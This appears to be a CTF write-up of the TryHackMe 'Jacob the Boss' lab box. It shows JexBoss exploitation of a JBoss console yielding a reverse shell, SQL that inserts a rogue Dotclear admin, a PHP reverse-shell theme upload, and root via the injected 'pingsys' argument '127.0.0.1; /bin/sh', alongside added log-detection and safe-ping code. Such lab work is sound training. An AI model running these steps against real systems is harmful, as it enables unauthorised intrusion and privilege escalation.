TryHackMe – Jacob the Boss

Description: “Well, the flaw that makes up this box is the reproduction found in the production environment of a customer a while ago, the verification in season consisted of two steps, the last one within the environment, we hit it head-on and more than 15 machines were vulnerable that together with the development team we were able to correct and adapt.

*First of all, add the jacobtheboss.box address to your hosts file.

Anyway, learn a little more, have fun!”

Tags: security, dotclear, exploit, jboss

TryHackMe Difficulty: Medium

Let’s start with an nmap/gobuster (assuming port 80) on the target.

Nmap:

odin@asgard:~$ nmap -sV -sC 10.10.174.124
Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-09 16:07 EDT
Nmap scan report for 10.10.174.124
Host is up (0.088s latency).
Not shown: 987 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
| 2048 82:ca:13:6e:d9:63:c0:5f:4a:23:a5:a5:a5:10:3c:7f (RSA)
| 256 a4:6e:d2:5d:0d:36:2e:73:2f:1d:52:9c:e5:8a:7b:04 (ECDSA)
|_ 256 6f:54:a6:5e:ba:5b:ad:cc:87:ee:d3:a8:d5:e0:aa:2a (ED25519)
80/tcp open http Apache httpd 2.4.6 ((CentOS) PHP/7.3.20)
|_http-server-header: Apache/2.4.6 (CentOS) PHP/7.3.20
|_http-title: My first blog
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
|_ 100000 3,4 111/udp6 rpcbind
1090/tcp open java-rmi Java RMI
|_rmi-dumpregistry: ERROR: Script execution failed (use -d to debug)
1098/tcp open java-rmi Java RMI
1099/tcp open java-object Java Object Serialization
| fingerprint-strings:
| NULL:
| java.rmi.MarshalledObject|
| hash[
| locBytest
| objBytesq
| xpJV
| http://jacobtheboss.box:8083/q
| org.jnp.server.NamingServer_Stub
| java.rmi.server.RemoteStub
| java.rmi.server.RemoteObject
| xpw;
| UnicastRef2
|_ jacobtheboss.box
3306/tcp open mysql MariaDB (unauthorized)
4444/tcp open java-rmi Java RMI
4445/tcp open java-object Java Object Serialization
4446/tcp open java-object Java Object Serialization
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
| ajp-methods:
| Supported methods: GET HEAD POST PUT DELETE TRACE OPTIONS
| Potentially risky methods: PUT DELETE TRACE
|_ See https://nmap.org/nsedoc/scripts/ajp-methods.html
8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1
| http-methods:
|_ Potentially risky methods: PUT DELETE TRACE
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Apache-Coyote/1.1
|_http-title: Welcome to JBoss™
8083/tcp open http JBoss service httpd
|_http-title: Site doesn't have a title (text/html).
3 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.93 seconds

gobuster:

odin@asgard:~$ gobuster dir -u http://jacobtheboss.box -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://jacobtheboss.box
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2020/10/09 16:15:09 Starting gobuster
===============================================================
/themes (Status: 301)
/public (Status: 301)
/admin (Status: 301)
/plugins (Status: 403)
/db (Status: 403)
/cache (Status: 403)
/inc (Status: 403)
/LICENSE (Status: 200)
/var (Status: 403)
/CHANGELOG (Status: 200)
/CREDITS (Status: 200)
/locales (Status: 301)
===============================================================
2020/10/09 16:46:50 Finished
===============================================================

We have SSH on 22, web servers on 80, 8080 and 8083, along with MySQL, rpcbind, and several Java RMI/serialization services on other misc. ports.

Doing a manual assessment of the port 80 web server, we note that it runs the ‘dotclear‘ CMS. Some research turns up a few possible entry points, but most require authenticated access. We have two other identified web servers, so let’s give those a look. The 8080 web server gives us a JBoss management page (now we understand the name of the box?). Perfect. JBoss is well known for having many possible flaws, so we’ll investigate it a bit further.

Navigating to /web-console/, we can see the “Morpheus” version of JBoss (5.0.0.GA). I wanted to attempt this manually, so I started following ‘Exploiting JBoss like a Boss‘. The article lists the vulnerable versions as ‘JBoss Application Server versions: 3, 4, 5 and 6.’ and exploits them through the upload of a malicious WAR file. Following the included steps, I was able to locate the MainDeployer service, but I did not see the noted ‘void deploy()’ operation, so a bit more research was done. Digging deeper through Google, I located JexBoss, a ‘tool for testing and exploiting vulnerabilities in JBoss Application Server and others Java Platforms, Frameworks, Applications, etc.’ This sounds exactly like what we’d want to make our life easier!

After installing per the instructions, let’s see what happens. We’ll start a netcat listener:

odin@asgard:~$ nc -lvnp 4444
listening on [any] 4444 ...

And run our script:

odin@asgard:~/jexboss$ sudo python jexboss.py -host http://jacobtheboss.box:8080

* --- JexBoss: Jboss verify and EXploitation Tool --- *
| * And others Java Deserialization Vulnerabilities * |
| |
| @author: João Filho Matos Figueiredo |
| @contact: joaomatosf@gmail.com |
| |
| @update: https://github.com/joaomatosf/jexboss |
#______________________________________________________#

@version: 1.2.4

* Checking for updates in: http://joaomatosf.com/rnp/releases.txt **


** Checking Host: http://jacobtheboss.box:8080 **

[*] Checking admin-console: [ OK ]
[*] Checking Struts2: [ OK ]
[*] Checking Servlet Deserialization: [ OK ]
[*] Checking Application Deserialization: [ OK ]
[*] Checking Jenkins: [ OK ]
[*] Checking web-console: [ VULNERABLE ]
[*] Checking jmx-console: [ VULNERABLE ]
[*] Checking JMXInvokerServlet: [ VULNERABLE ]


* Do you want to try to run an automated exploitation via “web-console” ?
If successful, this operation will provide a simple command shell to execute
commands on the server..
Continue only if you have permission!
yes/NO? yes

* Sending exploit code to http://jacobtheboss.box:8080. Please wait...

* Please enter the IP address and tcp PORT of your listening server for try to get a REVERSE SHELL.
OBS: You can also use the --cmd "command" to send specific commands to run on the server.
IP Address (RHOST): 10.6.22.82
Port (RPORT): 4444

* The exploit code was successfully sent. Check if you received the reverse shell
connection on your server or if your command was executed.
Type [ENTER] to continue...

Switching back to our nc tab:

connect to [10.6.22.82] from (UNKNOWN) [10.10.18.14] 57652
bash: no job control in this shell
[jacob@jacobtheboss /]$

Looks like we’re in. Based on the shell, it looks like we’re in the root of the file system, logged in as ‘jacob’. Do we have a home directory? Do we have a flag?

[jacob@jacobtheboss /]$ cd /home/jacob
cd /home/jacob
[jacob@jacobtheboss ~]$ ls -lah
ls -lah
total 16K
drwx------. 2 jacob jacob 78 Jul 31 10:23 .
drwxr-xr-x. 3 root root 19 Jul 30 22:05 ..
-rw-r--r--. 1 jacob jacob 18 Apr 1 2020 .bash_logout
-rw-r--r--. 1 jacob jacob 193 Apr 1 2020 .bash_profile
-rw-r--r--. 1 jacob jacob 231 Apr 1 2020 .bashrc
-rw-r--r--. 1 jacob jacob 33 Jul 31 10:23 user.txt

Yes, we have a flag. Let’s see it.

[jacob@jacobtheboss ~]$ cat /home/jacob/user.txt
cat /home/jacob/user.txt
*****************************cbcc

Now can we get root? Technically, yes, but I spent way too much time on this for something we could have done as ‘jacob’. We’ll continue on my methods until we reach the “final” solution.

I started an HTTP server on my host and uploaded LinPEAS to the box. Running it gave us a lot of interesting output. One item stood out: we can connect to MySQL as the root SQL user, with no password.

Also of note, the basic shell gave me a lot of stability issues; I recommend upgrading to something more stable:

  • python -c 'import pty;pty.spawn("/bin/bash")'

Anyhow, back to the open MySQL. Since I do some database administration along with my ‘jack of all trades’ security analyst day job duties, this was great news to me. I went down a few routes of seeing what we could exploit from within, such as this route by Pavan, and GTFOBins. After no luck, I went back to basics: we have MySQL root, so we can create users.

[jacob@jacobtheboss /]$ mysql -u root
mysql -u root
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 4
Server version: 5.5.65-MariaDB MariaDB Server

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]> SHOW DATABASES;
SHOW DATABASES;
+--------------------+
| Database |
+--------------------+
| information_schema |
| dotclear |
| mysql |
| performance_schema |
| test |
+--------------------+
5 rows in set (0.01 sec)

dotclear…wasn’t this our CMS from earlier? Dig…

MariaDB [(none)]> use dotclear
use dotclear
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MariaDB [dotclear]> SHOW TABLES;
SHOW TABLES;
+--------------------+
| Tables_in_dotclear |
+--------------------+
| dc_blog |
| dc_category |
| dc_comment |
| dc_link |
| dc_log |
| dc_media |
| dc_meta |
| dc_permissions |
| dc_ping |
| dc_post |
| dc_post_media |
| dc_pref |
| dc_session |
| dc_setting |
| dc_spamrule |
| dc_user |
| dc_version |
+--------------------+
17 rows in set (0.00 sec)

MariaDB [dotclear]> SELECT * FROM dc_user;
SELECT * FROM dc_user;
+---------+------------+-------------+--------------------------------------------------------------+-----------------+------------------+-----------+----------------+------------------+-------------------+----------+-----------+-------------------+--------------+-----------+---------------+------------------+---------------------+---------------------+
| user_id | user_super | user_status | user_pwd | user_change_pwd | user_recover_key | user_name | user_firstname | user_displayname | user_email | user_url | user_desc | user_default_blog | user_options | user_lang | user_tz | user_post_status | user_creadt | user_upddt |
+---------+------------+-------------+--------------------------------------------------------------+-----------------+------------------+-----------+----------------+------------------+-------------------+----------+-----------+-------------------+--------------+-----------+---------------+------------------+---------------------+---------------------+
| jacob | 1 | 1 | $2y$10$tICrvcvuwEQTwGhiT9F.6elbty1McHou9pFTFZTQL3oMqbPihr5YG | 0 | NULL | the Boss | Jacob | NULL | jacob@theboss.box | NULL | NULL | NULL | a:5:{s:9:"edit_size";i:24;s:14:"enable_wysiwyg";b:1;s:14:"toolbar_bottom";b:0;s:6:"editor";a:2:{s:5:"xhtml";s:10:"dcCKEditor";s:4:"wiki";s:14:"dcLegacyEditor";}s:11:"post_format";s:4:"wiki";} | pt | Europe/London | -2 | 2020-07-31 09:38:35 | 2020-07-31 09:38:35 |
+---------+------------+-------------+--------------------------------------------------------------+-----------------+------------------+-----------+----------------+------------------+-------------------+----------+-----------+-------------------+--------------+-----------+---------------+------------------+---------------------+---------------------+
1 row in set (0.00 sec)

Jacob…well, we know how Jacob is constructed. Can we insert ourselves into this?

MariaDB [dotclear]> INSERT INTO dc_user(user_id, user_super, user_status, user_pwd, user_change_pwd, user_name, user_firstname) VALUES('hacker','1','1','$2a$10$SmR13sEGX4FV/yrHjH8B6.DFY0TLOjFr.x2.7uQMZZANLCRXHspWS','0','hacker','hacker');
Query OK, 1 row affected (0.00 sec)

What did we do? We were able to insert a user ‘hacker’ into the ‘dc_user’ table with the bcrypt’ed hash for ‘password’. Can we login to the web portal (http://jacobtheboss.box/admin/auth.php) now on port 80? Yes, we can. And now that we’re in, we should do some research.

I found a lot of resources pointing to CVE-2018-16358 and CVE-2016-9268, but I didn’t see much for our listed version. I know this says 2.16.9, but sometimes things are a) not actually patched, or b) can still be performed manually. Let’s see if we can use CVE-2016-9268 (for 2.10.4) to recreate the same exploit. If we navigate to http://jacobtheboss.box/themes/, we’ll notice that the only item the themes have in common is ‘_define.php‘, so can we upload a malicious .zip file mimicking one of these themes, along with a reverse shell?

I pulled down the ‘_define.php’ file, along with a few other misc. files to create a mock file. Our ‘malicious.php’ is the PHP Reverse Shell from pentestmonkey. We’ve already added our RHOST and RPORT. Let’s package it.

odin@asgard:~/Downloads/dotclear$ ls -lah
total 44K
drwxr-xr-x 4 odin odin 4.0K Oct 13 13:02 .
drwxr-xr-x 9 odin odin 4.0K Oct 12 14:20 ..
-rw-r–r– 1 odin odin 251 Oct 12 14:44 _define.php
drwxr-xr-x 2 odin odin 4.0K Oct 12 14:18 img
-rw-r–r– 1 odin odin 5.4K Oct 12 14:59 malicious.php
-rw-r–r– 1 odin odin 636 Oct 12 14:18 print.css
drwxr-xr-x 2 odin odin 4.0K Oct 12 14:19 smilies
-rw-r–r– 1 odin odin 8.8K Oct 12 14:17 style.css
odin@asgard:~/Downloads/dotclear$ zip dotclear.zip *
adding: _define.php (deflated 26%)
adding: img/ (stored 0%)
adding: malicious.php (deflated 59%)
adding: print.css (deflated 47%)
adding: smilies/ (stored 0%)
adding: style.css (deflated 75%)

We’ll need to take our malicious .zip file and upload it here:

Looks like this was successful!

Now, let’s start our shell. Set your nc listener on the RPORT you set in the reverse shell, and navigate to our path of http://jacobtheboss.box/themes/dotclear/malicious.php.

odin@asgard:~$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.6.22.82] from (UNKNOWN) [10.10.190.9] 49438
Linux jacobtheboss.box 3.10.0-1127.18.2.el7.x86_64 #1 SMP Sun Jul 26 15:27:06 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
19:01:12 up 1:00, 0 users, load average: 0.00, 0.01, 0.05
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=48(apache) gid=48(apache) groups=48(apache) context=system_u:system_r:httpd_t:s0
sh: no job control in this shell
sh-4.2$ python -c 'import pty;pty.spawn("/bin/bash")'
python -c 'import pty;pty.spawn("/bin/bash")'
bash-4.2$ whoami
whoami
apache

So now we have shell access for 2 different users. We’ll pull down LinPEAS again to see if anything has changed (Hint: not much has).
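Both footholds so far leave a clear trace in web server access logs: the jexboss run above hit the JBoss web-console, jmx-console and JMXInvokerServlet endpoints on 8080, and the theme web shell was reached by requesting a PHP file directly under /themes/ on port 80. The following detection script is an added example, not part of the original write-up or of any tool it mentions; the log lines are constructed, and treating a direct request for a .php file under /themes/ as suspicious is a heuristic assumption (Dotclear normally serves pages through index.php).

```python
import re

# Constructed sample lines in Common Log Format: lines 1-2 imitate the
# JBoss/Tomcat listener on 8080, lines 3-5 the Apache/Dotclear site on 80.
SAMPLE_LOG = """\
10.6.22.82 - - [09/Oct/2020:16:30:01 -0400] "GET /jmx-console/HtmlAdaptor HTTP/1.1" 200 5123
10.6.22.82 - - [09/Oct/2020:16:30:02 -0400] "POST /web-console/Invoker HTTP/1.1" 200 1201
10.10.1.5 - - [09/Oct/2020:16:31:00 -0400] "GET /index.php?post/2020/07/31/Welcome HTTP/1.1" 200 8812
10.6.22.82 - - [13/Oct/2020:19:01:12 -0400] "GET /themes/dotclear/malicious.php HTTP/1.1" 200 0
10.10.1.5 - - [13/Oct/2020:19:02:00 -0400] "GET /themes/dotclear/style.css HTTP/1.1" 200 8800
"""

CLF_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)

# JBoss management and invoker paths that should never be reachable
# without authentication (the three jexboss reported as VULNERABLE, plus
# the legacy /invoker/ servlet path).
JBOSS_ADMIN_PREFIXES = ("/jmx-console/", "/web-console/", "/invoker/", "/admin-console/")


def classify(path):
    """Return a finding label for a request path, or None if it looks benign."""
    p = path.split("?", 1)[0].lower()
    if p.startswith(JBOSS_ADMIN_PREFIXES):
        return "jboss-admin-endpoint"
    # Heuristic (assumption): a direct hit on a .php file under /themes/ is
    # how an uploaded theme web shell gets executed.
    if p.startswith("/themes/") and p.endswith(".php"):
        return "direct-theme-php"
    return None


def scan_log(text):
    """Parse CLF lines; return (client_ip, path, status, label) for each hit."""
    findings = []
    for line in text.splitlines():
        m = CLF_RE.match(line)
        if not m:
            continue  # skip lines that are not in CLF
        label = classify(m.group("path"))
        if label:
            findings.append((m.group("ip"), m.group("path"), int(m.group("status")), label))
    return findings


if __name__ == "__main__":
    for ip, path, status, label in scan_log(SAMPLE_LOG):
        print(f"{label:22} {ip:15} {status} {path}")
```

A 200 on any jboss-admin-endpoint hit from an unexpected source is the signal to check whether the consoles were ever password-protected at all.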

One thing to note is the OS: Linux version 3.10.0-1127.18.2.el7.x86_64 (mockbuild@kbuilder.bsys.centos.org) (gcc version 4.8.5 20150623 (Red Hat 4.8.5-39) (GCC) ) #1 SMP Sun Jul 26 15:27:06 UTC 2020. I think this is something that caused an oversight on my part. I have worked with RHEL during my 9-5 for about 5 years, so I am familiar with a bit of the IBM system commands. Thinking back on our walkthrough of ‘Blog‘, the SUID binary files proved vital.

bash-4.2$ find / -perm -u=s -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
/usr/bin/pingsys
/usr/bin/fusermount
/usr/bin/gpasswd
/usr/bin/su
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/sudo
/usr/bin/mount
/usr/bin/chage
/usr/bin/umount
/usr/bin/crontab
/usr/bin/pkexec
/usr/bin/passwd
/usr/sbin/pam_timestamp_check
/usr/sbin/unix_chkpwd
/usr/sbin/usernetctl
/usr/sbin/mount.nfs
/usr/lib/polkit-1/polkit-agent-helper-1
/usr/libexec/dbus-1/dbus-daemon-launch-helper

I reached out to AJ (our UltraMegaChicken web guru) for a second set of eyes, since not only do I have ‘jacob’, but I have ‘apache’, and a few hours of looking has made them all a blur. I wanted insight into a possibly overlooked ‘apache’ user vulnerability I might have missed. I sent him the items I’d found so far. He had assumed this was an Ubuntu box, and immediately noticed ‘pingsys’ didn’t look like something he had seen. I indicated what pingsys does, but then started some research.

bash-4.2$ pingsys
pingsys
bash: -c: line 0: syntax error near unexpected token `('
bash: -c: line 0: `ping -c 4 (null)'
bash-4.2$ ltrace pingsys
ltrace pingsys
bash: ltrace: command not found
bash-4.2$ man pingsys
man pingsys
No manual entry for pingsys

We don’t have ltrace, fun. No man page? Suspicious. Looking further into ‘pingsys vulnerability’, I found this article. We have our vuln. Let’s try it out.

bash-4.2$ pingsys '127.0.0.1; /bin/sh'
pingsys '127.0.0.1; /bin/sh'
PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data.
64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.014 ms
64 bytes from 127.0.0.1: icmp_seq=2 ttl=64 time=0.027 ms
64 bytes from 127.0.0.1: icmp_seq=3 ttl=64 time=0.027 ms
64 bytes from 127.0.0.1: icmp_seq=4 ttl=64 time=0.027 ms

--- 127.0.0.1 ping statistics ---
4 packets transmitted, 4 received, 0% packet loss, time 2999ms
rtt min/avg/max/mdev = 0.014/0.023/0.027/0.008 ms
bash-4.2# whoami
whoami
root

We have root! Our semicolon delimited the commands in that string, allowing /bin/sh to run as root, and thus allowing us to continue as root.
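The root cause is visible in the earlier error output: pingsys hands `ping -c 4 <argument>` to `bash -c`, so shell metacharacters in the argument are interpreted. The snippet below is an added example (not the pingsys binary, not code from the write-up) showing the unsafe string-building pattern next to the fix: validate the argument as an IP address or plain hostname, and execute ping with an argv list so no shell ever parses it. The hostname rule is an assumption about what pingsys needs to accept.

```python
import ipaddress
import re
import subprocess

# Plain hostnames only: labels of letters, digits and hyphens joined by dots.
# Assumption: pingsys only ever needs IP addresses or simple hostnames.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(\.[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$"
)


def unsafe_command_line(target):
    """The pattern pingsys exhibits: the argument is pasted into a command
    string that a shell later parses, so ';', '|', '$(...)' and friends run."""
    return "ping -c 4 " + target


def validate_target(target):
    """Return target if it is an IP address or a plain hostname, else raise.
    '127.0.0.1; /bin/sh' fails because ';', space and '/' are not allowed."""
    try:
        ipaddress.ip_address(target)  # accepts IPv4 and IPv6 literals
        return target
    except ValueError:
        pass
    if HOSTNAME_RE.match(target):
        return target
    raise ValueError(f"refusing suspicious ping target: {target!r}")


def safe_ping_argv(target):
    """Build an argv list: validated target, and no shell involved at all.
    Validation guarantees the value cannot start with '-', so it can never
    be mistaken for a ping option either."""
    return ["ping", "-c", "4", validate_target(target)]


def safe_ping(target, timeout=15):
    """Run ping without shell=True and return its exit status. A SUID helper
    would additionally drop privileges; on Linux the cleaner fix is to give
    the real ping cap_net_raw instead of making a wrapper setuid root."""
    return subprocess.run(safe_ping_argv(target), timeout=timeout, check=False).returncode
```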

Let’s get our flag.

sh-4.2# cat /root/root.txt
cat /root/root.txt
*****************************2806

I went back to this box and attempted the same steps as the ‘jacob’ user, which worked. So overall, this could have been done much faster. But it was a great experience in stringing together different vectors. Another few takeaways from this box:

  • Try and obtain a stable shell earlier on. I must have dropped the base multiple times.
  • Use all of your resources. Don’t be afraid to ‘think tank’ with like minded individuals. Our core CTF group has an amazing mass of talent, and I’m lucky to be able to call upon them.
  • Don’t give up. You’ll stare at screens for hours with the same results – so get up, take a walk, grab some coffee, and come back with a fresh perspective.

 

 
